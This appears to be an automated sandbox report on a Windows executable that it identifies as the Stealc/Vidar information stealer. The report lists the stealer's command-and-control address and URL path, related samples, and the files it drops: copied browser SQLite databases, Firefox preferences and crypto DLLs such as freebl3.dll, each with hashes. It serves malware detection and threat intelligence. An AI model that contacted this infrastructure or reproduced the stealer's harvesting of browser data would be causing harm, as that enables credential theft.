              206894WHOLESALECONNECTIONSNLtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1501501
              Start date and time:2024-08-30 00:47:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 27s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:4
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@1/23@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 86%
              • Number of executed functions: 79
              • Number of non-executed functions: 114
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: file.exe
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.215.113.100file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealcBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousStealc, VidarBrowse
              • 185.215.113.100
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousLummaC, VidarBrowse
                file.exeGet hashmaliciousLummaC, VidarBrowse
                  file.exeGet hashmaliciousStealc, VidarBrowse
                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                      file.exeGet hashmaliciousLummaC, VidarBrowse
                        Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          file.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousStealc, VidarBrowse
                              eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                  Category:dropped
                                  Size (bytes):196608
                                  Entropy (8bit):1.121297215059106
                                  Encrypted:false
                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                  Category:dropped
                                  Size (bytes):20480
                                  Entropy (8bit):0.8439810553697228
                                  Encrypted:false
                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):5242880
                                  Entropy (8bit):0.03859996294213402
                                  Encrypted:false
                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):106496
                                  Entropy (8bit):1.136413900497188
                                  Encrypted:false
                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                  MD5:429F49156428FD53EB06FC82088FD324
                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):9504
                                  Entropy (8bit):5.512408163813622
                                  Encrypted:false
                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                  Category:dropped
                                  Size (bytes):40960
                                  Entropy (8bit):0.8553638852307782
                                  Encrypted:false
                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                  Category:dropped
                                  Size (bytes):20480
                                  Entropy (8bit):0.6732424250451717
                                  Encrypted:false
                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):98304
                                  Entropy (8bit):0.08235737944063153
                                  Encrypted:false
                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                  Category:dropped
                                  Size (bytes):51200
                                  Entropy (8bit):0.8746135976761988
                                  Encrypted:false
                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):685392
                                  Entropy (8bit):6.872871740790978
                                  Encrypted:false
                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: Z66MsXpleT.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: eSLlhErJ0q.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):608080
                                  Entropy (8bit):6.833616094889818
                                  Encrypted:false
                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):450024
                                  Entropy (8bit):6.673992339875127
                                  Encrypted:false
                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2046288
                                  Entropy (8bit):6.787733948558952
                                  Encrypted:false
                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):257872
                                  Entropy (8bit):6.727482641240852
                                  Encrypted:false
                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):80880
                                  Entropy (8bit):6.920480786566406
                                  Encrypted:false
                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                  MD5:A37EE36B536409056A86F50E67777DD7
                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):685392
                                  Entropy (8bit):6.872871740790978
                                  Encrypted:false
                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):608080
                                  Entropy (8bit):6.833616094889818
                                  Encrypted:false
                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):450024
                                  Entropy (8bit):6.673992339875127
                                  Encrypted:false
                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2046288
                                  Entropy (8bit):6.787733948558952
                                  Encrypted:false
                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):257872
                                  Entropy (8bit):6.727482641240852
                                  Encrypted:false
                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
